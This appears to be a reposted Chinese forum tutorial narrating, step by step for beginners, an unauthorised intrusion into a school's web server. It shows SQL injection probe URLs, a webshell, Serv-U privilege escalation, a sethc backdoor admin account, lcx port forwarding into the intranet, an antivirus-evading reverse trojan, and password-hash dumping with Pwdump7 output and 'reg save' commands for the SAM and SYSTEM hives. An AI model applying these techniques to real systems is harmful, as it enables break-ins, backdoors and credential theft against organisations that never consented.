入侵滲透進入某學(xué)校網(wǎng)站服務(wù)器

比較詳細(xì)適合新手大牛路過…
說做就做,日之
獨立ip服務(wù)器沒有掛其他站點
Ping ip返回值判斷對方機器是W2003服務(wù)器
在收集一下端口開了21 135 139
ftp XXX返回
220 Serv-U FTP Server v6.4 for WinSock ready..
裝了SEVER u
經(jīng)搜集確定服務(wù)器為win2003+asp+iis6.0+mssql
打開目標(biāo)3389沒反應(yīng)學(xué)校網(wǎng)站應(yīng)該是放在內(nèi)網(wǎng)
一、獲取webshell
首先從網(wǎng)站的asp程序入手
http://www.xxxxx.com/news.asp?id=21&sc=1%20and%201=1(and注入1=1頁面正常1=2頁面錯誤有注入)
返回到了首頁,再來
http://www.xxxxx.com/news.asp?id=21&sc=1%20or%201=1(or注入如果or1=1返回錯誤即有注入返回正確頁面則無注入)
又返回到了首頁看來這個網(wǎng)站的管理員還算有點安全知識
不死心繼續(xù)觀察利用搜索引擎載入到啊D掃掃site:xxxx.com asp?id=
http://www.xxxxx.com/show_news.asp?id=418’
隨手一個單引號

YES出現(xiàn)注入猜解猜解
激動的時候到了MD5 NOT FOUND暴力破解吧沒興趣
繼續(xù)回到主站看到了一個留言板抱著試試的心態(tài)

抓包提交后既然有數(shù)據(jù)庫地址
Ok小失誤成功得到地址

Fckeditor漏洞也可以利用
這里就不做演示了

二、服務(wù)器提權(quán)
掃描了下端口
本地打開21,1433,3389等端口,對外只開放了80端口
試著看下可寫目錄極品出來了

這就好辦了SU提權(quán)OK替換sethc成功加入管理
內(nèi)網(wǎng)進不去那我們就把它轉(zhuǎn)發(fā)出來用到lcx端口轉(zhuǎn)發(fā)
使用Lcx進行內(nèi)網(wǎng)端口轉(zhuǎn)發(fā)圖文講解

上傳lcx.exe
設(shè)置好之后成功進入服務(wù)器

在配置個馬兒反彈成功上線這個馬兒過內(nèi)殺軟全過瑞星就直接pass吧

三、內(nèi)網(wǎng)滲透
既然網(wǎng)站的安全這么差我就直接抓hash吧
使用Pwdump7提取系統(tǒng)密碼hash值
工具臨時下載地址:http://www.hackline.net/a/soft/cracking/2010/0412/3312.html
殺毒軟件可能會報毒。請自行檢測。
使用說明:
Pwdump7可以在CMD下提取出系統(tǒng)中的用戶的密碼hash (包括LM和NTLM),當(dāng)然必須要有系統(tǒng)權(quán)限.提取出了HASH,再用ophcrack破出明文密碼,對進一步滲透是有很大幫助的,經(jīng)我測試,在XP下是可以成功提取出來的.這個工具需要一個DLL文件支持,壓縮包中帶的,只需放到一個文件夾中即可,用法很簡單,直接輸入
D:\>PwDump7.exe
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
url: http://www.514.es
administrator:500:25FC25A0CA659E57ACEDB07452AB7A8E:6C1B3BE8D28CD3E7AB63122C8A572DDF:::
guest:501:0E175C3EFF8EED1652440321FCD91E4E:2850991451071A5B7A95F2977D4AAEF0:::
atarasco:1001:45C6AEEDC857A06DC595236F8F5FECAA:D0253497114C1B4CC337210F4580A716:::
用法:
pwdump7.exe (Dump system passwords)
pwdump7.exe -s <samfile> <systemfile> (Dump passwords from files)
pwdump7.exe -d <filename> [destionation] (Copy filename to destionation)
pwdump7.exe -h (Show this help)
-s 是從一個sam文件中提取hash,這個文件在%systemroot%\config\sam,這里.
-d 是把一個文件復(fù)制到另一個位置,D:\>PwDump7.exe -d c:\pagefile.sys pagefile.dmp 從這個例子中可以看出,他的特別之處在于,可以把進程正在占用的文件復(fù)制成功.
解決提示libeay32.dll找不到或缺少的問題
拷貝libeay32.dll到windows/system32下即可
在這里我給大家一個簡單的方法老外抓hash的方法
reg save hklm\system system
reg save hklm\sam sam
操作成功完成后自己就拿工具去破吧
感謝老大mr cool給我的工具
他的網(wǎng)站http://www.blackbap.org/
我這個內(nèi)網(wǎng)主機只有兩臺而且沒開3389
我就不繼續(xù)滲透了
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。